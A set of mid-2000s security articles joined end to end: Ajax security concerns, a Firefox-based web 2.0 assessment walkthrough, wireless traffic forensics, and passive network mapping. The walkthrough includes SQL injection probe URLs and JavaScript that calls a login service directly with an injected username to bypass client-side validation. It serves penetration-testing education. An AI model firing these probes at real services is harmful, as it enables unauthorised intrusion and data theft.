Typically, many web services within an enterprise (as opposed to on the Internet overall) were designed for B2B, and therefore designers and developers often did not expect interaction with actual users. This lack of foresight led to some bad security assumptions during design. For example, the initial designers may have assumed that authentication, authorization and input validation would be performed by other middle-tier systems. Once "outsiders" are allowed to directly call these services through the use of Ajax, an unexpected agent is introduced into the picture. A real-life example of such usage is the consistent pitch from Microsoft to use Atlas [ref 4] hand-in-hand with web services. Developers can now write JavaScript to create XML input and call the web service right from within the client's browser. In the past this was achieved through service proxies at the server.

* New possibilities for Cross-Site Scripting (XSS)

Another unfortunate truth is that attackers can be more creative (in other words, dangerous) with the use of Cross Site Scripting (XSS) vulnerabilities. [ref 5] Typically, attackers had to use XSS holes in a "single-threaded" world, where the attack was being carried out while the user's browser was in a wait state. This wait state provided some visual/behavioral cues to the user of a possibly misbehaving application. With the introduction of Ajax, an attacker can exploit Cross Site Scripting vulnerabilities in a more surreptitious manner. While you check your mail with an Ajax-enabled application, the malicious code could be sending email to all your friends without your browser giving you any visual cues at all.

Adequate, specialized security testing must be performed prior to moving the application into production to address these areas of concern. Even though Ajax applications are web applications, an organization's existing security testing methodologies may be insufficient due to the highly interactive nature of these applications.
4. How Ajax Complicates Current Security Testing Methodology

While testing a regular web application, a penetration tester starts by footprinting the application. The intent of the footprint phase is to capture the requests and responses so that the tester understands how the application communicates with the server and the responses it receives. The information is logged through local proxies such as Burp [ref 6] or Paros [ref 7]. It is important to be as complete as possible during the footprint phase so that the tester logs requests to all pages used by the application.

After that step, the tester will start the process of methodical fault injection, either manually or using automated tools, to test parameters that are passed to and from the web server.

Ajax complicates this methodology because of its asynchronous nature. Ajax applications are typically noisier when compared to regular web applications. An application may make multiple requests in the background even when it appears to be static to a user. A tester has to be aware of several situations which might cause difficulties with the application testing process. These include:

* The issue of "state"

In the regular web application world, the state of the application has been fairly well defined. Everything residing in the DOM for a page could be considered the current state of the page. If the state needed to change, a request was sent to the server and the response defined how the state changed.

In the Ajax world, things can change much more subtly. The application can potentially generate different types of requests depending on the current state of the page. The request generated by clicking on a list box may be different from the request generated by clicking on the same list box if the user has first selected a radio button on the page. Additionally, the response can update part of a page so that the user may now have new links or new controls to interact with on that page. During security testing, this behavior is of concern because it is much more difficult to determine if the tester has seen all possible types of requests that can be generated by a page or application. [ref 8]

* Requests initiated through timer events

This refers to updates to the user interface without any user interaction, through timer-based events. Applications may periodically send requests to the server to update information on the web page. For example, a financial application may use the XHR object to update parts of the web page that display current stock market information. The tester may not be aware of this process happening in the background if they do not catch the request at the right time, since there may not be visible links or buttons to suggest to the tester that there are requests being made in the background.

* Dynamic DOM updates

Ajax responses can contain JavaScript snippets that can be evaluated by the web application and presented at the user interface. This might include new links, access to new documents on the server, and so on. One way to achieve this is by using the eval() statement. [ref 2, ref 8] The eval() statement takes a single parameter, a string, and executes it as if it were a part of the program.

A good example is Google Suggest, where the application receives a JavaScript snippet which gets evaluated and shows up as possible suggestions to complete the query entered. This behavior can be problematic for the manual tester as well as for someone using automated tools. Either one will have to understand the context around how the JavaScript is being used in the web application. Close attention needs to be paid when an input parameter is sent back and evaluated on the client side. This might sound like typical XSS, and it is, but it has just become much easier to exploit. Applications which perform blacklist validation are even more susceptible because attackers don't need to inject as many tags. Several methods for using XSS without the script tag have been available in the past as well.

* XML Fuzzing

Ajax can be used to send requests and receive responses in XML format. Simplistic automated tools do understand GET and POST methods but may not understand how to deal with information encapsulated using the XML format.

The tester has to ensure that developers have not deviated from a secure architecture. In a secure system, the security controls are implemented in an environment which is outside the control of the end user. While performing reviews, one must look through the client-side code to determine if it is somehow modifying the state of variables (cookies, FORM parameters, GET parameters) before submitting them to the server. Any time this happens, the JavaScript code needs to be analyzed to determine the reasoning behind it.

Just like typical web applications, all Ajax requests should be tested for authorization issues. Developers might fall victim to believing that just because a page is called behind the scenes through the use of a client-side scripting engine, that authorization isn't necessary. This is not the case.
5. Conclusion

Ajax applications provide new possibilities through their highly interactive nature. Developers should be wary of new insecurities introduced by these capabilities. Security testers must augment their methodology and toolset to handle Ajax applications.

In this article, the authors have provided an introduction to some of the security implications found in Ajax technologies. Penetration testers are seeing that they have the knowledge and tools to evaluate Ajax applications, but that they are somewhat more difficult to test. Future articles will look at more areas of concern as well as helpful tools that can be used with Ajax security testing.
6. References

[ref 1] Google Suggest and Google Maps, two early Ajax applications.

[ref 2] Stewart Twynham, "AJAX Security", Feb. 16th, 2006.

[ref 3] Andrew van der Stock, "AJAX Security", OWASP Presentation given on February 7, 2006. A direct descendent of this presentation is also available from Andrew van der Stock at http://www.greebo.net/owasp/ajax_security.pdf.

[ref 4] Microsoft's Atlas framework tries to integrate as a middle-tier.

[ref 5] Post by "Samy," on a "Technical explanation of the MySpace worm".

[ref 6] Burp web application proxy for penetration testing.

[ref 7] Paros web application proxy for penetration testing.

[ref 8] post by Rogan Dawes, author of WebScarab, on the WebAppSec mailing list.
7. Further reading

* Jesse James Garrett, "Ajax: A New Approach to Web Applications", Feb. 18, 2005.

* Ryan Asleson and Nathaniel T. Schutta, "Foundations of Ajax", APress Publications, Oct 2005.

* Nicholas C. Zakas, Jeremy McPeak and Joe Fawcett, "Wrox Professional Ajax", Feb 2006.

* Eric Pascarello, "Eric Pascarello dissects Ajax security vulnerabilities", Feb. 07, 2006.

* Andrew van der Stock, "Ajax and Other 'Rich' Interface Technologies".

8. About the authors
Jaswinder S. Hayre, CISSP, and Jayasankar Kelath, CISSP, are both Sr. Security Engineers with Ernst & Young's Advanced Security Center in New York.


Hacking Web 2.0 Applications with Firefox

Introduction

AJAX and interactive web services form the backbone of “web 2.0” applications. This technological transformation brings about new challenges for security professionals.

This article looks at some of the methods, tools and tricks to dissect web 2.0 applications (including Ajax) and discover security holes using Firefox and its plugins. The key learning objectives of this article are to understand the:

  • web 2.0 application architecture and its security concerns.
  • hacking challenges such as discovering hidden calls, crawling issues, and Ajax side logic discovery.
  • discovery of XHR calls with the Firebug tool.
  • simulation of browser event automation with the Chickenfoot plugin.
  • debugging of applications from a security standpoint, using the Firebug debugger.
  • methodical approach to vulnerability detection.

Web 2.0 application overview

The newly coined term “web 2.0” refers to the next generation of web applications that have logically evolved with the adoption of new technological vectors. XML-driven web services that are running on SOAP, XML-RPC and REST are empowering server-side components. New applications offer powerful end-user interfaces by utilizing Ajax and rich internet application (Flash) components.

This technological shift has an impact on the overall architecture of web applications and the communication mechanism between client and server. At the same time, this shift has opened up new security concerns [ref 1] and challenges.

New worms such as Yamanner, Samy and Spaceflash are exploiting “client-side” AJAX frameworks, providing new avenues of attack and compromising confidential information.

Figure 1.
Figure 1. Web 2.0 architecture layout.

As shown in Figure 1, the browser processes on the left can be divided into the following layers:

  • Presentation layer - HTML/CSS provides the overall appearance to the application in the browser window.
  • Logic & Process - JavaScript running in the browser empowers applications to execute business and communication logic. AJAX-driven components reside in this layer.
  • Transport - XMLHttpRequest (XHR) [ref 2]. This object empowers asynchronous communication capabilities and XML exchange mechanism between client and server over HTTP(S).

The server-side components on the right of Figure 1, which typically reside in the corporate infrastructure behind a firewall, may include deployed web services along with traditional web application resources. An Ajax resource running in the browser can talk directly to XML-based web services and exchange information without refreshing the page. This entire communication is hidden from the end-user; in other words, the end-user would not "feel" any redirects. The use of "Refresh" and "Redirects" was an integral part of the first generation of web application logic. In the web 2.0 framework they are reduced substantially by implementing Ajax.

Web 2.0 assessment challenges

In this asynchronous framework, the application does not have many “Refreshes” and “Redirects”. As a result, many interesting server-side resources that can be exploited by an attacker are hidden. The following are three important challenges for security people trying to understand web 2.0 applications:

1. Discovering hidden calls - It is imperative to identify the XHR-driven calls generated by the loaded page in the browser. The page uses JavaScript over HTTP(S) to make these calls to the backend servers.
  2. Crawling challenges - Traditional crawler applications fail on two key fronts: one, to replicate browser behavior and two, to identify key server-side resources in the process. If a resource is accessed by an XHR object via JavaScript, then it is more than likely that the crawling application may not pick it up at all.
  3. Logic discovery - Web applications today are loaded with JavaScript and it is difficult to isolate the logic for a particular event. Each HTML page may load three or four JavaScript resources from the server. Each of these files may have many functions, but the event may be using only a very small part of all these files for its execution logic.

We need to investigate and identify the methodology and tools to overcome these hurdles during a web application assessment. For the purpose of this article, we will use Firefox as our browser and try to leverage some of its plugins to combat the above challenges.

Discovering hidden calls

Web 2.0 applications may load a single page from the server but may make several XHR object calls when constructing the final page. These calls may pull content or JavaScript from the server asynchronously. In such a scenario, the challenge is to determine all XHR calls and resources pulled from the server. This is information that could help in identifying all possible resources and associated vulnerabilities. Let's start with a simple example.

Suppose we can get today’s business news by visiting a simple news portal located at:

http://example.com/news.aspx

The page in the browser would resemble the screenshot illustrated below in Figure 2.

Figure 2.
Figure 2. A simple news portal page.

Being a web 2.0 application, Ajax calls are made to the server using an XHR object. We can determine these calls by using a tool known as Firebug [ref 3]. Firebug is a plug-in to the Firefox browser and has the ability to identify XHR object calls.

Prior to browsing a page with the plugin, ensure the option to intercept XHR calls is selected, as shown in Figure 3.

Figure 3.
Figure 3. Setting Firebug to intercept XMLHttpRequest calls.

With the Firebug option to intercept XMLHttpRequest calls enabled, we browse the same page to discover all XHR object calls made by this particular page to the server. This exchange is shown in Figure 4.

Figure 4.
Figure 4. Capturing Ajax calls.

We can see several requests made by the browser using XHR. The page has loaded the Dojo Ajax framework from the server while simultaneously making a call to a server-side resource to fetch the news articles:

http://example.com/getnews.aspx?date=09262006

If we look closely at the code, we can see the following JavaScript function:

function getNews()
{
    var http = new XMLHttpRequest();
    http.open("GET", "getnews.aspx?date=09262006", true);
    http.onreadystatechange = function()
    {
        if (http.readyState == 4) {
            var response = http.responseText;
            document.getElementById('result').innerHTML = response;
        }
    }
    http.send(null);
}

The preceding code makes an asynchronous call to the backend web server and asks for the resource getnews.aspx?date=09262006. The content of the response is placed at the 'result' id location in the resulting HTML page. This is clearly an Ajax call using the XHR object.

By analyzing the application in this fashion, we can identify vulnerable internal URLs, query strings and POST requests as well. For example, in the case above, the parameter "date" is vulnerable to an SQL injection attack.
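
As a quick illustration (a purely hypothetical probe; the payload and the resulting error behavior depend entirely on the backend), appending a single quote to the parameter and watching for a database error message is a common first test:

http://example.com/getnews.aspx?date=09262006'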

Crawling challenges and browser simulation

An important reconnaissance tool when performing a web application assessment is the web crawler. A crawler visits every single page and collects all HREFs (links). But what if an HREF points to a JavaScript function that makes Ajax calls using the XHR object? The crawler may miss this information altogether.

In many cases it becomes very difficult to simulate this environment. For example, consider a page that exposes a set of simple links.

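The markup for such links might look something like the following illustrative reconstruction (the href values and the second, ordinary link are hypothetical; only the first anchor fires an XHR call through its onClick handler):

<a href="#" onclick="getMe(); return false;">go1</a>
<a href="/news.aspx">go2</a>
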
The "go1" link, when clicked, will execute the getMe() function. The code for the getMe() function is shown below. Note that this function may be implemented in a completely separate file.

function getMe()
{
    var http = new XMLHttpRequest();
    http.open("GET", "hi.html", true);
    http.onreadystatechange = function()
    {
        if (http.readyState == 4) {
            var response = http.responseText;
            document.getElementById('result').innerHTML = response;
        }
    }
    http.send(null);
}

The preceding code makes a simple Ajax call to the hi.html resource on the server.

Is it possible to simulate this click using automation? Yes! Here is one approach using the Firefox plug-in Chickenfoot [ref 4], which provides JavaScript-based APIs and extends the browser with a programmable interface.

By using the Chickenfoot plugin, you can write simple JavaScript to automate browser behavior. With this methodology, simple tasks such as crawling web pages can be automated with ease. For example, the following simple script will "click" all anchors that have onClick handlers. The advantage of this plug-in over traditional web crawlers is distinct: each of these onClick events triggers backend XHR-based Ajax calls that crawlers are likely to miss, because crawlers try to parse JavaScript and collect possible links but cannot fire actual onClick events.

l = find('link')
for (i = 0; i < l.count; i++) {
    a = document.links[i];
    test = a.onclick;
    if (!(test == null)) {
        // synthesize a mouse click so any onClick handler (and its XHR call) actually fires
        var e = document.createEvent('MouseEvents');
        e.initMouseEvent('click', true, true, document.defaultView, 1, 0, 0, 0,
                         0, false, false, false, false, 0, null);
        a.dispatchEvent(e);
    }
}

You can load this script in the Chickenfoot console and run it as shown in Figure 5.

Figure 5. Simulating an onClick Ajax call with Chickenfoot.

This way, one can write JavaScript to assess Ajax-based applications from within the Firefox browser. Several API calls [ref 5] can be used in the Chickenfoot plugin; a particularly useful one is the "fetch" command, which can be used to build a crawling utility, as sketched below.
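
The following is a rough sketch of such a utility, not a drop-in tool. It assumes that fetch(url) loads the given page so that document.links then reflects its anchors, and that output() writes to the Chickenfoot output pane; the seed URLs are hypothetical, and the exact semantics of these commands should be checked against the API reference [ref 5].

// Rough crawling sketch built on Chickenfoot commands (see the assumptions above).
urls = ["http://example.com/news.aspx", "http://example.com/login.html"];  // hypothetical seed list
for (j = 0; j < urls.length; j++) {
    fetch(urls[j]);                                   // load the page without user interaction
    for (i = 0; i < document.links.length; i++) {
        output(document.links[i].href);               // record every discovered link
        if (document.links[i].onclick != null) {
            output("  onClick handler found - possible XHR trigger");
        }
    }
}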

Logic discovery & dissecting applications

To dissect client-side Ajax-based applications, one needs to go through each of the events very carefully in order to determine the processing logic. One way of determining the entire logic is to walk through each line of code. Often, however, an event ends up calling only a few functions from specific files, so one needs a technique to step through just the relevant code that gets executed in the browser.

There are a few powerful JavaScript debuggers that can be used to achieve this objective. Firebug is one of them; another is Venkman [ref 6]. We shall use Firebug again in our example.

Let's take a simple example of a login process. The login.html page accepts a username and password from the end-user, as shown in Figure 6. Use the "Inspect" feature of Firebug to determine the properties of the form.

Figure 6. Form property inspection with Firebug.

After inspecting the form properties, it is clear that a call is made to the "auth" function. We can now go to the debugger feature of Firebug, as illustrated in Figure 7, and isolate the internal logic for this particular event.

Figure 7. Debugging with Firebug.

All JavaScript dependencies of this particular page can be viewed. Calls are made to the ajaxlib.js and validation.js scripts. These two scripts contain several functions, and it can be deduced that the login process uses some of them. We can set a breakpoint to step through the application: once a breakpoint is set, we can input credential information, click the "Submit" button and control the execution process. In our example, we have set a breakpoint in the "auth" function, as shown in Figure 8.

Figure 8. Setting a breakpoint and controlling execution process.

We now step through the debugging process by clicking the "step in" button highlighted in Figure 8. JavaScript execution moves to another function, userval, residing in the file validation.js, as shown in Figure 9.

Figure 9. Moving to validation.js script page.

The preceding screenshot shows the regular expression pattern used to validate the username field. Once validation is done, execution moves to another function, callGetMethod, as shown in Figure 10.
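
To make the control flow easier to follow, the chain observed in the debugger might be reconstructed roughly as follows. The function and file names come from the walkthrough itself; the function bodies, element ids and regular expression are purely hypothetical stand-ins for what Figures 8 through 10 show.

// Hypothetical reconstruction of the client-side login chain (not the application's actual code).
function auth() {
    var user = document.getElementById('username').value;   // element ids are assumptions
    var pass = document.getElementById('password').value;
    if (userval(user)) {             // client-side validation, defined in validation.js
        callGetMethod(user, pass);   // Ajax call to the backend, defined in ajaxlib.js
    }
}

function userval(user) {
    // example pattern only; the real expression is the one visible in Figure 9
    return /^[a-zA-Z0-9]{4,12}$/.test(user);
}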

Figure 10. Making an Ajax call.

Finally, at the end of the execution sequence, we can observe the call to the backend web service being made by the XHR object. This is shown in Figure 11.

Figure 11. Web services call on the Firebug console.

Here we have identified the resource location for the backend web services:

http://example.com/2/auth/ws/login.asmx/getSecurityToken?username=amish&password=amish

The preceding resource is clearly a web service running on the .NET framework. This dissection process has turned up an interesting detail: the user validation routine runs entirely on the client and can be bypassed very easily, which is a potential security threat to the web application.

Taking our assessment further, we can access the web service and its endpoints by using the WSDL file and brute force the service directly, as sketched below. We can also launch several different injection attacks - SQL or XPATH - with tools such as wsChess [ref 7].
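
As a minimal sketch of why the client-side check is irrelevant to an attacker (assuming the service accepts GET requests, as observed above; the credentials and the quote-based probe are hypothetical), the endpoint can simply be requested directly, skipping userval() entirely:

// Illustrative only: call the backend service directly, bypassing the client-side validation.
var http = new XMLHttpRequest();
http.open("GET", "http://example.com/2/auth/ws/login.asmx/getSecurityToken" +
                 "?username=admin'&password=x", true);   // hypothetical injection probe
http.onreadystatechange = function() {
    if (http.readyState == 4) {
        // inspect the raw response for error messages that hint at SQL or XPATH injection
        alert(http.responseText);
    }
};
http.send(null);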

In this particular case, the application is vulnerable to an XPATH injection. The overall methodology for web services assessment is different and is outside the scope of this article. However, this walkthrough technique helps identify several client-side attacks, such as XSS, DOM manipulation attacks, client-side security control bypasses, malicious Ajax code execution, and so on.

Conclusion

Service-oriented architecture (SOA), Ajax, Rich Internet Applications (RIA) and web services are critical components of next-generation web applications. To keep pace with these technologies and combat next-generation application security challenges, one needs to design and develop different methodologies and tools. One efficient way of assessing these applications is to make effective use of the browser itself.

In this article we have seen three techniques for assessing web 2.0 applications. By using these methodologies it is possible to identify and isolate several Ajax-related vulnerabilities. Browser automation scripting can assist in web asset profiling and discovery, which in turn helps identify vulnerable server-side resources.

Next-generation applications use JavaScript extensively, and good debugging tools are our knights in shining armor. The techniques covered in this article are a good starting point for web 2.0 assessments using Firefox.

References

[ref 1] Ajax security, http://www.securityfocus.com/infocus/1868
[ref 2] XHR Object specification, http://www.w3.org/TR/XMLHttpRequest/
[ref 3] Firebug download, https://addons.mozilla.org/firefox/1843/; Firebug usage, http://www.joehewitt.com/software/firebug/docs.php
[ref 4] Chickenfoot quick start, http://groups.csail.mit.edu/uid/chickenfoot/quickstart.html
[ref 5] Chickenfoot API reference, http://groups.csail.mit.edu/uid/chickenfoot/api.html
[ref 6] Venkman walkthrough, http://www.mozilla.org/projects/venkman/venkman-walkthrough.html
[ref 7] wsChess, http://net-square.com/wschess

About the author

Shreeraj Shah, BE, MSCS, MBA, is the founder of Net Square and leads Net Square’s consulting, training and R&D activities. He previously worked with Foundstone, Chase Manhattan Bank and IBM. He is also the author of Hacking Web Services (Thomson) and co-author of Web Hacking: Attacks and Defense (Addison-Wesley). In addition, he has published several advisories, tools, and whitepapers, and has presented at numerous conferences including RSA, AusCERT, InfosecWorld (Misti), HackInTheBox, Blackhat, OSCON, Bellua, Syscan, etc. You can read his blog at http://shreeraj.blogspot.com/.

Reprints or translations

Reprint or translation requests require prior approval from SecurityFocus.

© 2006 SecurityFocus


Wireless Forensics: Tapping the Air - Part Two
Raul Siles, GSE 2007-01-08

Introduction

In part one of this series, we discussed the technical challenges for wireless traffic acquisition and provided design requirements and best practices for wireless forensics tools. In this second article, we take it a step further and focus on the technical challenges for wireless traffic analysis. Additionally, advanced anti-forensic techniques that could thwart a forensic investigation are analyzed. Finally, apart from the technical details, the article covers some legal aspects of wireless forensics for both the U.S. and Europe.

Wireless forensics: Technical considerations for traffic analysis

Once the traffic has been collected by the forensic examiner, it must be analyzed to draw conclusions about the case. The main technical considerations, tools and challenges associated with the analysis of 802.11 traffic from a wireless forensics perspective are presented below.

The scope of this article is wireless forensics from the traffic point of view, although in a real scenario there are other sources of information to complement the data related to the case. These sources include access point and wired network device logs, ARP and CAM tables, and the data collected by wireless IDS.

Network Forensic Analysis Tools (NFAT): Commercial and open-source traffic analysis tools

The analysis of wireless traffic demands the same capabilities required in pure wired network forensics, that is, an in-depth understanding of the protocols involved in the data communications collected. For wireless, this commonly means TCP/IP-based protocols over 802.11.

The set of network tools used to analyze traffic from a forensic perspective is commonly called NFAT (Network Forensic Analysis Tool), a term coined in 2002. The major commercial players in the wired field are Sandstorm NetIntercept [ref 1], Niksun NetVCR [ref 2] and eTrust Network Forensics [ref 3]. Wireless forensics requires these tools to provide wireless traffic analysis capabilities, that is, advanced analysis functions for the specific 802.11 headers, protocol flows and behaviors. At the time of this writing, both NetIntercept and eTrust NF claim 802.11 capabilities.

From an open-source perspective, there are no well-known, dedicated NFAT alternatives. However, there are multiple tools [ref 4] that provide network traffic analysis capabilities that are very useful for the forensic examiner to find specific pieces of information in the evidence collected.

Simplifying things: the graphical Wireshark [ref 5] protocol dissector is used to inspect every field of the captured frames in depth, ngrep (network grep) [ref 6] is used to search for specific strings in the contents of the frames, and the text-based tcpdump [ref 7] and tshark [ref 5] sniffers are used to automate and script certain analysis tasks, such as filtering traffic based on specific conditions. Most commercial and open-source tools support the standardized Pcap file format (referenced in the first part of this article) for interoperability and data exchange purposes.
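
For instance, on an unencrypted or already-decrypted capture, typical invocations look like the following (the capture file name and the search string are hypothetical):

# read a saved capture with tcpdump, filtering for POP3 traffic
tcpdump -nn -r wireless_capture.pcap 'tcp port 110'

# search the frame payloads of the same capture for a specific string with ngrep
ngrep -q -I wireless_capture.pcap 'USER'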

Analyzing wireless traffic

The traffic analysis process involves multiple tasks, such as data normalization and mining (to be able to easily manipulate and search through the data obtained), traffic pattern recognition (required to identify anomalies and suspicious patterns), protocol dissection (very relevant for understanding all the different protocol header fields and their contents) and the reconstruction of application sessions (to obtain application-level visualization).

Covering all these areas (very similar to standard traffic analysis for wired networks) could require a book of its own; therefore, this section concentrates on specific technical issues that should be considered during the analysis phase for wireless traffic. These issues include merging traffic from multiple channels, managing traffic from overlapping channels, filtering capabilities and fast analysis. One of the main challenges particular to wireless forensics relates to the built-in 802.11 layer-2 encryption features of this technology; this aspect is covered in the next section.

One of the first wireless analysis issues to consider is merging the capture files corresponding to the individual channels. When using a multi-card device, such as the one suggested in the first part of this article, each card listens on a specific channel and collects data for that channel in its own Pcap file.

In some scenarios, such as with roaming clients, the data from various channels must be merged to reconstruct the roaming session. For this purpose, it is possible to use the mergecap tool included with Wireshark. The tool merges multiple capture files into a single output Pcap file (-w option), as shown below:

# mergecap -w all_channels.pcap channel_1.pcap channel_2.pcap ... channel_14.pcap

Wireshark also provides a menu option, "File – Merge...", to merge two Pcap files. In either case the packets must be merged chronologically so that the resulting file reflects the traffic over time.
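
As a quick sanity check on the result (the file name follows the mergecap example above), capinfos, which also ships with Wireshark, can print the first and last packet timestamps of the merged file:

# show the capture start and end times of the merged file
capinfos -a -e all_channels.pcap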

An example has been made available for the reader to follow along [ref 8]. It is a slightly modified version of a file capture provided by Aircapture, and includes two Pcap files containing a VoIP session from a roaming client switching between two access points, from channel 11 to channel 1. The example is provided so that the reader can test the merging functionality using Wireshark and reconstruct the audio conversation (which, by the way, contains a commercial message) for this VoIP session. The details of how to use Wireshark (previously called Ethereal) to reconstruct VoIP RTP sessions were covered in a previous SecurityFocus article [ref 9]. Briefly, the steps for the new Wireshark version are:

  • Decode RTP packets: Select the first RTP packet in the Pcap file and select “Statistics – RTP – Stream Analysis...”.
  • RTP Stream Analysis: Select “Save payload...” to store the media stream.
  • Save the audio: Select the “.au” format, the “forward” channel and the filename to save the audio stream that contains the voice captured.

Due to the lack of SIP packets, and the use of 8000 as the source and destination ports, the RTP packets in the capture file for channel 1 are decoded by default in Wireshark as OICQ packets. They must be decoded as RTP; this can be accomplished by selecting any OICQ packet, going to "Analyze – Decode As...", finding and selecting the RTP protocol, and clicking OK.

To get the most from this exercise, it is recommended that the reader first reconstruct and listen to the media stream of each individual file, then merge both into a single file and reconstruct its media stream. The latter contains the concatenation of the media stream fragments captured on each wireless channel. At about 30 seconds into the playback, the roaming takes place.

Additionally, another wireless analysis issue to consider is the fact that the capture file for a given channel might contain data from overlapping channels, that is, traffic from networks on adjacent channels. Depending on the access point's transmission capabilities and the analyst's reception device, such as the output transmission (Tx) power, the reception (Rx) sensitivity and the antennas used, it is possible to capture data from multiple channels simultaneously.

The capture file shown below in Figure 1, which is also available to the reader [ref 10], corresponds to the beacon frames of a capture session on channel 9. The sniffer collected traffic from channels 9 (Null SSID and SSID “WLAN_7B”), 11 (SSID “WopR”) and 12 (SSID “ANA”). The channel information is included in the beacon frame, specifically, in the “DS Parameter set: Current Channel” field of the “Tagged parameters” section inside the “IEEE 802.11 wireless LAN management frame” header.


Figure 1. Beacon frames from multiple channels captured on channel 9.

Therefore, during the analysis phase it is necessary to identify and discard duplicated frames and manage this kind of multi-channel interference and collision.

Probably the most commonly used feature when dealing with huge amounts of information is the traffic analyzer's filtering capability. Once the traffic has been merged into a single Pcap file, for example, filters allow one to display the traffic associated with a single client across all channels based on its MAC address, display just the traffic from a single access point based on its BSSID, or display only data frames (versus management and control frames). The filtering options in tools like Wireshark are nearly endless [ref 11] and something the forensic examiner must become familiar with.
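
A few representative Wireshark display filters are shown below (the MAC addresses are hypothetical); each can be typed directly into the filter bar or combined with the usual logical operators:

wlan.addr == 00:11:22:33:44:55       (all frames sent to or from a given client)
wlan.bssid == 00:aa:bb:cc:dd:ee      (frames belonging to a single access point)
wlan.fc.type == 2                    (data frames only; type 0 is management, 1 is control)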

Finally, there is a relatively new open-source tool, Honeysnap [ref 12], that parses single or multiple Pcap files and produces an initial analysis report identifying significant traffic events, statistics and flows. It provides security analysts with a pre-processed list of high-value network activity, aimed at focusing manual forensic analysis and saving incident investigation time.

Although it was designed as a honeynet-related tool to quickly analyze the data collected by a honeynet, it can be very helpful for the network forensic investigator in establishing initial facts about the traffic collected. Once the analyst has identified data of interest, he can then use other tools for more in-depth analysis. Currently, the tool can decode TCP and UDP-based protocols, such as HTTP, IRC or DNS, but it does not have wireless capabilities; therefore, it is only useful on unencrypted wireless traffic. However, due to its extensible modular infrastructure, it can be modified to include the wireless knowledge required for forensic analysis.


[ref 1] Sandstorm NetIntercept. http://www.sandstorm.net/products/netintercept/
[ref 2] Niksun NetVCR. http://www.niksun.com/Products_NetVCR.htm
[ref 3] eTrust Network Forensics. http://www3.ca.com/solutions/Product.aspx?ID=4856
[ref 4] "Summary of tools commonly used to support network forensic investigations". http://searchsecurity.techtarget.com/searchSecurity/downloads/NetworkForensicToolsSidebar.pdf
[ref 5] Wireshark & tshark. http://www.wireshark.org
[ref 6] ngrep (network grep). http://ngrep.sourceforge.net
[ref 7] tcpdump. http://www.tcpdump.org
[ref 8] “Pcap files containing a roaming VoIP session”. http://www.raulsiles.com/downloads/VoIP_roaming_session.zip
[ref 9] “Two attacks against VoIP”. Peter Thermos. April 2006. http://www.securityfocus.com/print/infocus/1862
[ref 10] “Pcap file containing traffic from multiple channels and captured from a single channel, 9”. http://www.raulsiles.com/downloads/multi_channel_beacons.pcap
[ref 11] “Wireshark & Ethereal Network Protocol Analyzer Toolkit”. Angela Orebaugh, Gilbert Ramirez, Jay Beale (Series Editor). Syngress. ISBN: 1597490733. Chapter 5 – “Filters”: http://www.syngress.com/book_catalog/377_Eth_2e/sample.pdf
[ref 12] Honeysnap. The Honeynet Project. 2006. http://www.honeynet.org/tools/honeysnap/


Passive Network Analysis
Stephen Barish 2007-09-28

In sports, it's pretty much accepted wisdom that home teams have the advantage; that's why teams with winning records on the road do so well in the playoffs. But for some reason we rarely think about "the home field advantage" when we look at defending our networks. After all, the best practice in architecting a secure network is a layered, defense-in-depth strategy. We use firewalls, DMZs, VPNs, and configure VLANs on our switches to control the flow of traffic into and through the perimeter, and use network and host-based IDS technology as sensors to alert us to intrusions.

These are all excellent security measures – and that's why they are considered "best practices" in the industry – but they all fall loosely into the same category of protection that a castle provided in the Middle Ages. While they act as barriers to deter and deny access to known, identifiable bad guys, they do very little to protect against unknown threats or attackers who are already inside the enterprise, and they do little to help us understand our networks so we can better defend them. This is what playing the home field advantage is all about - knowing our networks better than our adversaries possibly can, and turning their techniques against them.

Paranoid? Or maybe just prudent...

Our objective is to find out as much as possible about our own networks. Ideally we could just stroll down and ask the IT folks for a detailed network topology, an identification of our address ranges, and the commonly used ports and protocols on the network. It seems counter-intuitive, but smaller enterprises actually do a better job of tracking this kind of information than gigantic multinational companies, partially because there is less data to track, and also because security and IT tend to work better together in smaller organizations.

In fact, large companies have a real problem in this area, especially if their business model includes growth through mergers and acquisitions. Sometimes the IT staff doesn't even know all the routes to the Internet, making it pretty tough to defend these amalgamated enterprises.

The first, most basic piece of information we need about our networks in order to defend them well is the network map. Traditionally, attackers and defenders use network mapping tools such as nmap [1], which use a stimulus-response method to confirm the existence of a host and, depending on the options used, to identify its operating system and open ports. This technique relies on non-RFC-compliant responses to "odd" packets and has been around a long time. (Fyodor provides a great paper [2] on the technique, and pretty much pioneered the field of active operating system identification.) Active network mapping is a very powerful technique, but it does have its limitations. It introduces a significant amount of traffic on the network, and some of that traffic can cause problems for network applications; in some cases, nmap can even cause operating system instability, although this has become less common in recent years. Active mapping tools also only provide a snapshot in time of the enterprise topology and composition, and they generally have difficulties or limitations dealing with firewalls, NAT, and packet-filtering routers. Fortunately there are passive analysis techniques that generate similar results.
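
For reference, a typical active sweep looks something like the following (the address range is hypothetical, and OS detection requires administrative privileges):

# SYN-scan a subnet and attempt active OS identification with nmap
nmap -sS -O 192.168.1.0/24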

Passive Analysis Theory

Passive network analysis is much more than intrusion detection, although that is its most commonly used form. Passive techniques can map connections, identify ports and services in use in the network, and can even identify operating systems. Lance Spitzner of the Honeynet Project [3] and Michal Zalewski [4] helped pioneer passive fingerprinting techniques that reliably identify operating systems from TCP/IP traces. Zalewski's p0f v2.0.8 [5] is one of the best passive OS fingerprinting tools available, and is the one used in this article to demonstrate some of the capabilities of the technique.
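
Running p0f is straightforward: a minimal invocation simply listens on an interface and prints a fingerprint line for each TCP SYN it observes (the interface name here is hypothetical, and option names can vary between p0f versions, so check the built-in help):

# passively fingerprint hosts whose traffic crosses this interface
p0f -i eth1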

The key to passive network analysis is understanding that it works almost the same as active mapping and OS fingerprinting. All passive techniques rely on a stimulus-response scenario; they just rely on someone else's stimulus and then collect the response (Figure 1).


Figure 1 – Active and Passive Network Analysis

In the active scenario, the target (A) responds to stimulus provided by our mapping engine, which is useful, but an artificial observation condition we created just to conduct the mapping exercise. In the passive scenario, the target (A) responds to stimuli resulting from normal use. In both cases we can see the ports and services involved, connection flow, timing information, and can make some educated guesses about our network's operating characteristics from the resulting data. But the passive technique allows something the active one does not: we can see the network from the perspective of the user and application behavior during normal operations.


WiMax: Just Another Security Challenge?

Wireless networks have long been hailed as easily deployed, low-cost solutions for providing broadband services to an increasingly mobile population. As with any emerging technology, however, it wasn't long before attackers were exploiting it.

